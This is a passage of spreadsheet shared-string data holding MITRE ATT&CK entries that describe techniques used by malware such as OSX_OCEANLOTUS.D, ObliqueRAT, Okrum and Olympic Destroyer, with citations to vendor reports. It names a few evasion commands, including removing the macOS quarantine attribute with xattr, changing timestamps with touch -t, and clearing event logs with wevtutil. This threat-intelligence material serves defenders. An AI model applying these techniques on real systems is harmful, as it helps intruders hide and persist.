  <si>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</si>
  <si>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relationship--bd79d063-3407-4da9-b6d1-6170a3b9edfc</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</si>
  <si>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</si>
  <si>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relationship--544cc12a-53c4-4a56-b480-bfc79beee93c</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has relied on users mounting and executing a malicious DMG file.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>relationship--557288c3-8463-4900-b2e5-aa9856d428cd</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>relationship--8f8d2b41-acb9-4fdf-ad90-c59fd6fad882</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</si>
  <si>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</si>
  <si>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relationship--950fca51-66e4-43c6-9af0-839e962b8409</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) has collected the IOPlatformUUID, session UID, and the OS version using the command &lt;code&gt;sw_vers -productVersion&lt;/code&gt;.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)</t>
  </si>
  <si>
    <t>relationship--9db842bf-d65d-44a8-93ca-aef62cadafc1</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</si>
  <si>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</si>
  <si>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relationship--6ea74151-62ea-462e-988e-7704db70ec87</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used AES in CBC mode to encrypt collected data when saving that data to disk.(Citation: Unit42 OceanLotus 2017)</t>
  </si>
  <si>
    <t>relationship--cfae5caf-6084-4082-a2a4-8728ea424807</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) scrambles and encrypts data using AES256 before sending it to the C2 server.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>relationship--8bb51178-fa35-4441-99f3-f01fb305b03b</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has the ability to upload files from a compromised host.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>relationship--cabdb159-174a-4fbd-b026-1d67f8f59dcf</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</si>
  <si>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</si>
  <si>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relationship--4ca73e82-4e56-4044-a21a-d613a80f171c</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</si>
  <si>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</si>
  <si>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relationship--207c59d5-9df0-4838-9a0a-5555ea78b35f</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses the command &lt;code&gt;xattr -d com.apple.quarantine&lt;/code&gt; to remove the quarantine file attribute used by Gatekeeper.(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>relationship--e735944e-9387-4cfb-bf2c-0a1c27d93bce</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) sets the main loader file’s attributes to hidden.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>relationship--60fa966f-bb77-481f-9541-8a14e965718a</t>
  </si>
  <si>
    <t>26 September 2019</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a command to download and execute a file on the victim’s machine.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>relationship--5cb54f4b-f615-44ad-94d6-136ff507c2d6</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>relationship--5a872d22-22e6-49b1-8ddd-7efc6c403ad6</t>
  </si>
  <si>
    <t>If running with &lt;code&gt;root&lt;/code&gt; permissions, [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can create a persistence file in the folder &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt;.(Citation: TrendMicro MacOS April 2018)(Citation: sentinelone apt32 macOS backdoor 2020)</t>
  </si>
  <si>
    <t>relationship--75a7d2f6-fa2c-499c-8e4f-f8d1d2735173</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has changed permissions of a second-stage payload to an executable via &lt;code&gt;chmod&lt;/code&gt;.(Citation: sentinelone apt32 macOS backdoor 2020)</t>
  </si>
  <si>
    <t>relationship--0d40b95c-629c-46bf-bafc-2558a180fedc</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has disguised it's true file structure as an application bundle by adding special characters to the filename and using the icon for legitimate Word documents.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>relationship--f376ba97-3fe5-4c51-aa2c-0c1e35fcfcda</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</si>
  <si>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</si>
  <si>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relationship--9e6bbb1a-95c6-4f51-9aff-6b424c731cfc</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used a custom binary protocol over port 443 for C2 traffic.(Citation: Unit42 OceanLotus 2017)</t>
  </si>
  <si>
    <t>relationship--04610729-6f83-48d4-9f5b-1c1c4a39df3a</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used a custom binary protocol over TCP port 443 for C2.(Citation: Unit42 OceanLotus 2017)</t>
  </si>
  <si>
    <t>relationship--5a34e6af-f5e1-4191-aec0-06a92201f414</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) encrypts its strings in RSA256 and encodes them in a custom base64 scheme and XOR.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>relationship--0112eb25-7f6c-49cd-95c8-bf0d49f7c380</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses PowerShell scripts.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>relationship--ee73acc3-a506-41a2-b7b9-e5aa9b68342b</t>
  </si>
  <si>
    <t>For network communications, [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) loads a dynamic library (`.dylib` file) using `dlopen()` and obtains a function pointer to execute within that shared library using `dlsym()`.(Citation: Unit42 OceanLotus 2017)</t>
  </si>
  <si>
    <t>relationship--e6e81473-84f4-40f0-b7a1-122599f801e6</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a variant that is packed with UPX.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>relationship--79127e56-edbc-422b-9c32-72ce55f5ec04</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used `zlib` to compress all data after 0x52 for the custom TCP C2 protocol.(Citation: Unit42 OceanLotus 2017)</t>
  </si>
  <si>
    <t>relationship--6d69c030-d557-4d35-b5dc-99ee973f10eb</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) encrypts data sent back to the C2 using AES in CBC mode with a null initialization vector (IV) and a key sent from the server that is padded to 32 bytes.(Citation: Unit42 OceanLotus 2017)</t>
  </si>
  <si>
    <t>relationship--47b5c142-c0e5-4754-ae7f-b95bf01d3a5b</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</si>
  <si>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</si>
  <si>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relationship--3f921bea-899f-4b13-94b2-13f7a4813b8b</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</si>
  <si>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</si>
  <si>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relationship--588865e4-caec-4150-9c03-df5e28eb9c79</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can collect the network interface MAC address on the infected host.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>relationship--22067fc3-6919-41b5-b506-4a00830af5c4</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can use the &lt;code&gt;touch -t&lt;/code&gt; command to change timestamps.(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: 20 macOS Common Tools and Techniques)</t>
  </si>
  <si>
    <t>relationship--630ef5c5-438d-4681-b4e9-b9dee3934848</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</si>
  <si>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</si>
  <si>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relationship--4f9fef8b-1ceb-4a10-b6ea-ff2a9680154f</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses Word macros for execution.(Citation: TrendMicro MacOS April 2018)</t>
  </si>
  <si>
    <t>relationship--60bab055-6927-4240-8716-6218dc131aa9</t>
  </si>
  <si>
    <t>[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can also use use HTTP POST and GET requests to send and receive C2 information.(Citation: Trend Micro MacOS Backdoor November 2020)</t>
  </si>
  <si>
    <t>relationship--6c2e3490-d5d7-44de-9736-acc3669c7a6a</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can break large files of interest into smaller chunks to prepare them for exfiltration.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--6aae6da8-eaf5-4139-a773-25075c4e0cc6</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) has the ability to extract data from removable devices connected to the endpoint.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--ab3599ae-66cd-49c2-bfa7-cbec9af6e271</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) has the ability to recursively enumerate files on an infected endpoint.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--898416fc-2061-47ae-a642-25442906a2d8</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can copy specific files, webcam captures, and screenshots to local directories.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--bb6be5dd-602d-4625-859a-eb6c5bddc29c</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) has gained execution on targeted systems through luring users to click on links to malicious URLs.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)</t>
  </si>
  <si>
    <t>relationship--754a5c00-45bb-4279-bdd2-ec11d54f2926</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can discover pluggable/removable drives to extract files from.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--483772af-6fc0-487b-aa3f-4006253708b3</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can check for blocklisted process names on a compromised host.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--c5dffed7-7e56-4cee-8f96-065b4718000d</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can gain persistence by a creating a shortcut in the infected user's Startup directory.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--4a34355b-dcbb-41a7-b562-167a76c93d9e</t>
  </si>
  <si>
    <t xml:space="preserve">[ObliqueRAT](https://attack.mitre.org/software/S0644) can capture a screenshot of the current screen.(Citation: Talos Oblique RAT March 2021)
</t>
  </si>
  <si>
    <t>relationship--18ed716d-2865-4a7a-98f8-915f07c183dc</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can hide its payload in BMP images hosted on compromised websites.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--8aca6fab-b526-4716-98e0-1300847b9478</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can halt execution if it identifies processes belonging to virtual machine software or analysis tools.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--94a0ffdf-5244-4f13-9730-3715b1bc6943</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) has the ability to check for blocklisted computer names on infected endpoints.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--792376f7-db54-4ae9-b50a-38b67ed96053</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can check for blocklisted usernames on infected endpoints.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--c7c2e904-7797-4d67-a0bf-dae4abf53689</t>
  </si>
  <si>
    <t>[ObliqueRAT](https://attack.mitre.org/software/S0644) can capture images from webcams on compromised hosts.(Citation: Talos Oblique RAT March 2021)</t>
  </si>
  <si>
    <t>relationship--e31c20e8-f6f7-4ebb-89e0-51c34597c379</t>
  </si>
  <si>
    <t>S0346</t>
  </si>
  <si>
    <t>OceanSalt</t>
  </si>
  <si>
    <t>malware--288fa242-e894-4c7e-ac86-856deedf5cea</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can delete files from the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--6e0796d1-4bba-4e18-85fd-8e0d86bf8b35</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can extract drive information from the endpoint and search files on the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--6c130c97-8623-4d14-829e-0e90dd0757a0</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can encode data with a NOT operation before sending the data to the control server.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--1dac9ffa-1523-4cab-b28f-2d5642ee08aa</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the name and ID for every process running on the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--a3138e56-a496-486d-b11e-5e1c39a9c15d</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) has been delivered via spearphishing emails with Microsoft Office attachments.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--faf1e821-465d-40cc-b523-73f1ba308932</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the computer name from the system.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--88d53468-4ab8-455e-bd16-dc52ef9a3d96</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can collect the victim’s IP address.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--2ab707bc-9e11-4b6e-858f-c1576f9fc3a0</t>
  </si>
  <si>
    <t>[OceanSalt](https://attack.mitre.org/software/S0346) can create a reverse shell on the infected endpoint using cmd.exe.(Citation: McAfee Oceansalt Oct 2018) [OceanSalt](https://attack.mitre.org/software/S0346) has been executed via malicious macros.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>relationship--102d7613-aabc-4d54-b0fe-88501924da86</t>
  </si>
  <si>
    <t xml:space="preserve">[Octopus](https://attack.mitre.org/software/S0340) has compressed data before exfiltrating it using a tool called Abbrevia.(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>relationship--ae4c3306-57b7-46da-8073-9336cf96e5cf</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can exfiltrate files from the system using a documents collector tool.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--17e5edb8-fcdf-4581-a428-5a3a75fc675a</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has uploaded stolen files and data from a victim's machine over its C2 channel.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>relationship--49267afd-b71b-4dd0-a68a-128e61f7bdfd</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has exfiltrated data to file sharing sites.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--6e137013-3837-4b56-8424-4ea6d87044b5</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can collect information on the Windows directory and searches for compressed RAR files on the host.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--6d3fee1f-1c19-4ad8-9cd9-e5b00e5b040a</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can download additional files and tools onto the victim’s machine.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--c77d6f2a-664e-4bbb-bf86-c2c58adbdc84</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has stored collected information in the Application Data directory on a compromised host.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--97ffb5c1-05da-42b4-90eb-60c1eedc1292</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--e3f77039-014f-4786-b226-808167d75a96</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has been disguised as legitimate programs, such as Java and Telegram Messenger.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--5bb90c4f-b260-4de2-8312-8de73df3fead</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</si>
  <si>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</si>
  <si>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relationship--850d1949-38bc-4cb2-be8f-22d249ebfaf5</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can capture screenshots of the victims’ machine.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--f590ef19-3b83-459d-993c-a599407b7ca0</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has been delivered via spearsphishing emails.(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--c389a84f-0ab2-4ab8-aa65-cb668513fce8</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has encoded C2 communications in Base64.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>relationship--4919cec0-77ce-4505-91e5-5a538fe1b198</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can collect system drive information, the computer name, the size of the disk, OS version, and OS architecture information.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>relationship--75a1f636-76d3-4029-ae40-0a7a3b8d7eba</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can collect the host IP address from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>relationship--6b184c8f-99d6-4af2-8c01-34fc5d6d89e3</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) can collect the username from the victim’s machine.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>relationship--348f9f2e-c959-4485-9a0b-e95f6d4ceb72</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has used HTTP GET and POST requests for C2 communications.(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>relationship--b58b7cb7-ba2a-40ef-9532-c134b8811415</t>
  </si>
  <si>
    <t>[Octopus](https://attack.mitre.org/software/S0340) has used wmic.exe for local discovery information.(Citation: Securelist Octopus Oct 2018)</t>
  </si>
  <si>
    <t>relationship--b4810e29-e543-4816-a6a2-d9c0b96eed07</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used a custom implementation of AES encryption to encrypt collected data.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--cebe7625-3bb7-4353-9b48-cd4251410968</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using a RAR archiver tool to compress/decompress data.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--0b582433-b5e6-49d7-886c-e1edd1a0a802</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using modified Quarks PwDump to perform credential dumping.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--060d2cd5-a734-4c78-908c-a9ddabe3aa89</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--b3f66735-fafe-49be-b55c-4d087d1351a7</t>
  </si>
  <si>
    <t>Data exfiltration is done by [Okrum](https://attack.mitre.org/software/S0439) using the already opened channel with the C2 server.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--743a0baf-8d6d-4e4a-a72b-0413a5d49594</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--95e5fd0e-b9c1-4efa-b462-a922456401e6</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s backdoor deletes files after they have been successfully uploaded to C2 servers.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--bf603371-ff65-4b57-b80a-4f93daafbed6</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used DriveLetterView to enumerate drive information.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--8908a544-e6b6-485a-8251-6c8dd1fbc040</t>
  </si>
  <si>
    <t>Before exfiltration, [Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used hidden files to store logs and outputs from backdoor commands.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--8c77a88d-1390-4736-b7c9-f902b62d7f45</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has built-in commands for uploading, downloading, and executing files to the system.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--140dda5e-b3d5-47ce-aac5-22060d5bddf2</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using a keylogger tool to capture keystrokes. (Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--d96d964f-fec6-475e-acc5-d25ff0d46af9</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using MimikatzLite to perform credential dumping.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--f89f5b59-9a3d-4f3a-9740-2bc1e063b752</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--65f315be-e62d-44a5-b21a-7211041a75bb</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--fcd3bc09-f88b-43d7-989d-10f7058e655e</t>
  </si>
  <si>
    <t xml:space="preserve">[Okrum](https://attack.mitre.org/software/S0439) establishes persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019) </t>
  </si>
  <si>
    <t>relationship--cab93d90-f8de-4bb3-8868-11b8d9a2ddf9</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s installer can attempt to achieve persistence by creating a scheduled task.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--40fad687-982e-4cd3-955c-3c458e34e5df</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can create a new service named NtmsSvc to execute the payload.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--8483ad9a-84c9-4c83-a4d7-d403e44735dc</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can establish persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--09962c1d-38be-43f6-83bc-a63d1bebdb2d</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) has used base64 to encode C2 communication.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--7898362c-a930-4cd4-9c94-019a253af141</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s payload is encrypted and embedded within its loader, or within a legitimate PNG file.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--54ece776-8a64-4e0c-9d54-4350680c07b8</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase. (Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--abf2a4b0-d0d7-4f13-9b7c-647abc3694e2</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--108e61c1-83fc-4ebf-aa5c-4ff19ccbe7cf</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect computer name, locale information, and information about the OS and architecture.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--702ed555-03e2-4660-82d8-e85d46cbec02</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect network information, including the host IP address, DNS, and proxy information.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--39897b0a-f48b-4d3b-8ba0-d6f8f26d00d4</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) was seen using NetSess to discover NetBIOS sessions.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--ce48fd88-9fed-44d6-864f-07d8994c89d2</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can collect the victim username.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--6d8147e4-fca3-4348-9376-dd96cc7b9e30</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can obtain the date and time of the compromised system.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--e6f9ae1e-7002-4c62-be60-f45eca42061e</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--2abdb5f5-6ff1-4f05-b925-429595011475</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--874148d5-d7cb-43c2-905f-1582f90005f6</t>
  </si>
  <si>
    <t xml:space="preserve">[Okrum](https://attack.mitre.org/software/S0439) loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.(Citation: ESET Okrum July 2019) </t>
  </si>
  <si>
    <t>relationship--121152af-4bfe-4202-ade0-aad9fb85e0ad</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439) uses HTTP for communication with its C2.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--3a040d38-be65-49b4-a41a-3fd010f3ea9a</t>
  </si>
  <si>
    <t>[Okrum](https://attack.mitre.org/software/S0439)'s backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--1e5cae4c-240d-495b-9eca-34bba583d894</t>
  </si>
  <si>
    <t>To establish persistence, [Okrum](https://attack.mitre.org/software/S0439) can install itself as a new service named NtmSsvc.(Citation: ESET Okrum July 2019)</t>
  </si>
  <si>
    <t>relationship--2ef7a9cd-aba5-4360-9a8f-f6b58ff4492d</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to clear the System and Security event logs using &lt;code&gt;wevtutil&lt;/code&gt;.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--4d880164-0891-4721-b393-7e3a3bcc0fd9</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) contains a module that tries to obtain stored credentials from web browsers.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--17d2730a-c2b7-4d58-b22f-921600daccfb</t>
  </si>
  <si>
